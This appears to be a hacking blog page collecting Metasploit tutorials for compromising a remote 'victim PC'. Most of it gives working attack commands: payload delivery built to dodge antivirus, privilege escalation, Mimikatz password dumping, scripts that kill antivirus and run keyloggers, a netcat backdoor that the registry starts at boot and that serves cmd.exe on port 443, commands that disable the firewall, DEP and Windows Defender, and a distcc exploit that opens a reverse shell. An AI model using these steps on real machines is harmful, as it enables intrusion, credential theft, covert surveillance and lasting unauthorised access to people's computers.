How to Get Information of Antivirus in Remote Victim PC using Metasploit

Windows Antivirus Exclusions Enumeration

This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.

Module Name

post/windows/gather/enum_av_excluded

msf > use post/windows/gather/enum_av_excluded
msf post(enum_av_excluded) > sessions
            ...sessions...
msf post(enum_av_excluded) > set SESSION <session-id>
msf post(enum_av_excluded) > show options
            ...show and set options...
msf post(enum_av_excluded) > run

Web Delivery metasploit Script

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
            ...targets...
msf exploit(web_delivery) > set TARGET <target-id>
msf exploit(web_delivery) > show options
            ...show and set options...

msf exploit(web_delivery) > exploit

   

A-PDF WAV to MP3 v1.0.0 Buffer Overflow

This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.

exploit : exploit/windows/fileformat/a_pdf_wav_to_mp3

msf > use exploit/windows/fileformat/a_pdf_wav_to_mp3 msf exploit(a_pdf_wav_to_mp3) > show targets
...targets...
msf exploit(a_pdf_wav_to_mp3) > set TARGET <target-id>
msf exploit(a_pdf_wav_to_mp3) > show options
...show and set options...
msf exploit(a_pdf_wav_to_mp3) > exploit

Windows Gather Enum User MUICache metasploit module

This module gathers information about the files and file paths that logged on users have executed on the system. It also will check if the file still exists on the system. This information is gathered by using information stored under the MUICache registry key. If the user is logged in when the module is executed it will collect the MUICache entries by accessing the registry directly. If the user is not logged in the module will download users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are parsed from the downloaded hive.

Module : post/windows/gather/enum_muicache

msf > use post/windows/gather/enum_muicache 
msf post(enum_muicache) > sessions
         ...sessions...
msf post(enum_muicache) > set SESSION <session-id>
msf post(enum_muicache) > show options
        ...show and set options...
msf post(enum_muicache) > run

How to install Metasploit in ubuntu

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Click here to download metasploit for ubuntu

Reflective DLL Injection Metasploit Module

 

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.

Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.

Download  : Reflective DLL Injection Exploit

VIDEO TUTORIAL : 

Windows Manage Memory Payload Injection

This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

Exploit : exploit/windows/local/payload_inject

VIDEO :  
 

Windows SYSTEM Escalation via KiTrap0D

This module will create a new session with SYSTEM privileges via the KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

exploit : exploit/windows/local/ms10_015_kitrap0d

Targets : Windows 2K SP4 - Windows 7 (x86)

Win32ksys elevation of privilege vulnerability

win32k.sys is kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability." 

 Vulnerable system : windows XP SP3,windows 2003 SP2,Windows 7 SP1,Windows 2008 32bit and Windows 2008 R2 SP1 64bit

Click Here to Get exploit

Dumping Cleartext login Credentials with Mimikatz

Mimikatz is a tool that can dump clear text passwords from memory.

Click here to Download Mimikatz

In modern Windows systems where UAC is in place we will need to bypass it with the use of the metasploit post exploitation module bypassuac (post/windows/escalate/bypassuac) for execute Mimikatz.

Best Meterpreter Script

getcountermeasure

Getcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more.

Command : run getcountermeasure


winenum

Winenum script is used to dump tokens, hashes and more

Command : run winenum

getgui

getgui script is used to enable RDP on a target system.

Command : run getgui -e


killav

Killav used to disable most antivirus programs.

Command : run killav
gettelnet

gettelnet script is used to enable telnet on the victim.

Command : run gettelnet -e

hostedit

Hostedit Meterpreter script is used to edit host file of windows

Command : run hostedit

checkvm

Checkvm used to see if you exploited a virtual machine

Command : run checkvm

screenspy

screenspy used to take screenshot of remote pc.

Command : run screenspy

keylogrecorder

keylogrecorder used to start keylogger in victim pc.

Command : run keylogrecorder

metsvc

used to make permanent backdoor

How to get MUICache Entries in Remote Windows Machine

According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

use post/windows/gather/enum_muicache

msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (enum_muicache)>set session 2

msf exploit (enum_muicache)>exploit

How to Disable Windows Firewall using Metasploit

Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7, it is still powerful—but we have made it more flexible and easier to use.

For example, now you can fine-tune the protection and notifications you want for each of your network profiles—Home, Work, and Public. When you are connected to a public network like a library or a coffee shop, you may want to block all incoming connections. At home or work, this might be overkill. Whatever level of protection you choose for your profiles, you will be able to switch between them with ease.

Command : 

netsh firewall set opmode disable 

How to Install Netcat Backdoor on a Remote Machine Using Metasploit

When an attacker successfully compromise a system they need to maintain the connection, that's why the attacker usually installing backdoor on victim computer for future use to make attacker easily connect to victim computer to use victim resource, and collecting data on victim computer.

1 - we must upload netcat to the remote system.
Command :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

2 - now we edit in registry to have netcat execute on start up and listen on port 443
Command :
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

3 - add our NetCat into start up process
Command :
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

4 - To check our backdoor in autorun process or not
Command :
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

VIDEO :

How to stop Date Execution Prevention Service(DEP) using Metasploit in Windows

Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Command : bcdedit.exe /set {current} nx AlwaysOff

How to Stop Windows Defender Service in remote pc using Metasploit

When Windows Defender is on, you're notified when spyware or other potentially unwanted software tries to install itself or run on your computer. If you use the default settings, Windows Defender also checks for new definitions (files that are used to determine if software is spyware) and automatically removes any detected item that has a recommended removal action.

Command : net stop WinDefend

Fix msfupdate Problem

Error : Could not find pg-0.15.0 in any of the sources. Run `bundle install` to install missing gems

The possibility of this error was their because while i was running the msfupdate command it shows me a error in some pg-0.15.1 package installation.

solution

• Go the this path (for 64 bit backtrack 5r3) - root@bt: cd /opt/metasploit/ruby/lib/ruby/1.9.1/x86_64-linux/

• Edit this file rbconfig.rb

• Search for this line - CONFIG["LIBRUBYARG_STATIC"] = “-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static”  and Remove this - -l$(RUBY_SO_NAME)-static

• Save 

Video :

Configure xssf Metasploit Plugin in Kali Linux

The Cross-Site Scripting Framework (XSSF) is security tool designed to turn the XSS vulnerability exploitation task.XSSF allows creating a communication channel with the targeted browser (XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers.XSSF provides a powerful documented API, which facilitates development of modules and attacks. In addition, its integration into the Metasploit Framework allows users to launch MSF browser based exploit easily from XSS vulnerability.

How to Configure :

1 - kali Linux terminal and type cd /opt/metasploit/apps/pro/msf3

2 - In msf3 install xssf using following command

Svn export http://xssf.googlecode.com/svn/trunk ./ --force 

3 - Load XSSF plugin using the command - load xssf

VIDEO : 

HTTP SSL Certificate Information using Metasploit Auxiliary module

Parse the server SSL certificate to obtain the common name and signature algorithm

Rank

- Normal

Authors

• et < et [at] metasploit.com >


• Chris John Riley < >


• Veit Hailperin < hailperv [at] gmail.com >

msf > use auxiliary/scanner/http/ssl
msf auxiliary(ssl) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ssl) > run

Source Code : http://adf.ly/LL7LN

 VIDEO :

 

DistCC Daemon Command Execution

This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Exploit RanK - Excellent
Cvss Score - 9.3

Commands :

msfconsole

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS]
msf exploit(distcc_exec) > set RHOST [TARGET IP]
msf exploit(distcc_exec) > exploit

VIDEO